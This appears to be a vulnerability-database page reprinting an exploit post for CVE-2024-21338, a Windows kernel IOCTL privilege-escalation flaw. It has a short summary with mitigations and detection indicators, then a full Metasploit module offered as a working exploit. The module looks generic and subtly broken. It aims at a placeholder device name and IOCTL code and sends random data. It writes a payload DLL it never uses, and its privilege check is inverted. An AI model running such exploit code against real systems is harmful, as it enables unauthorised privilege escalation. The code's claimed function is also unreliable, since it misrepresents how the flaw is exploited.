Vulners
Lucene search
📄 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control
10
=============================================================================================================================================
| # Title : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338
[+] Summary :
CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input/Output Control) handlers.
This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.
Technical Details:
Vulnerability Type: Insufficient Access Control
Attack Vector: Local
Privileges Required: Low
Impact: Privilege Escalation
Affected Systems:
Windows 10 (various versions)
Windows 11 (various versions)
Windows Server 2019/2022
Key Components:
Vulnerable Component: Windows Kernel IOCTL handlers
Attack Mechanism: Direct kernel object manipulation
Exploitation: Through device driver interface
Exploitation Flow:
text
1. Identify vulnerable IOCTL handlers
2. Open handle to vulnerable device driver
3. Craft malicious IOCTL requests
4. Bypass access control checks
5. Execute arbitrary code in kernel context
Mitigation Strategies:
Apply Security Updates: Install Microsoft January 2024 security patches
Driver Whitelisting: Implement driver signature enforcement
Access Control: Restrict access to device interfaces
Monitoring: Monitor for suspicious driver activity
Detection Indicators:
Unusual IOCTL requests to kernel drivers
Attempts to access privileged device interfaces
Unexpected driver loading patterns
[+] POC :
#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
'Description' => %q{
This module exploits an insufficient access control vulnerability in the Windows Kernel
through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
kernel-level functionality leading to privilege escalation.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
],
'Platform' => 'win',
'Arch' => [ARCH_X64],
'SessionTypes' => ['meterpreter'],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'Targets' => [
[
'Windows 10/11 x64',
{
'Arch' => ARCH_X64,
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'DisclosureDate' => '2024-01-09',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
])
end
def check
if sysinfo['OS'] !~ /windows/i
return CheckCode::Safe('Target is not a Windows system')
end
if sysinfo['Architecture'] !~ /x64/
return CheckCode::Safe('Target architecture is not supported')
end
unless is_system?
return CheckCode::Detected('User does not have SYSTEM privileges')
end
device_path = datastore['DEVICE_NAME']
if device_exists?(device_path)
return CheckCode::Appears('Vulnerable device driver detected')
else
return CheckCode::Safe('Vulnerable device driver not found')
end
end
def exploit
print_status("Starting exploitation for CVE-2024-21338")
unless check == CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
print_status("Generating payload...")
payload_data = generate_payload_dll
temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
print_status("Writing payload to #{temp_path}")
write_file(temp_path, payload_data)
register_file_for_cleanup(temp_path)
print_status("Triggering vulnerability via IOCTL...")
if trigger_exploit(temp_path)
print_good("Exploitation successful!")
else
fail_with(Failure::Unknown, "Exploitation failed")
end
end
private
def device_exists?(device_path)
begin
file = client.railgun.kernel32.CreateFileA(
device_path,
'GENERIC_READ',
'FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_ATTRIBUTE_NORMAL',
0
)
if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
client.railgun.kernel32.CloseHandle(file['return'])
return true
end
rescue
return false
end
false
end
def trigger_exploit(payload_path)
begin
device_handle = client.railgun.kernel32.CreateFileA(
datastore['DEVICE_NAME'],
'GENERIC_READ | GENERIC_WRITE',
0,
nil,
'OPEN_EXISTING',
0,
0
)
if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
print_error("Failed to open device handle")
return false
end
buffer_size = 1024
input_buffer = Rex::Text.rand_text_alpha(buffer_size)
ioctl_result = client.railgun.kernel32.DeviceIoControl(
device_handle['return'],
datastore['IOCTL_CODE'],
input_buffer,
input_buffer.length,
nil,
0,
4,
nil
)
client.railgun.kernel32.CloseHandle(device_handle['return'])
if ioctl_result['return']
print_good("IOCTL sent successfully")
return true
else
print_error("IOCTL failed")
return false
end
rescue => e
print_error("Exploitation error: #{e.message}")
return false
end
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.8
EPSS0.78644
SSVC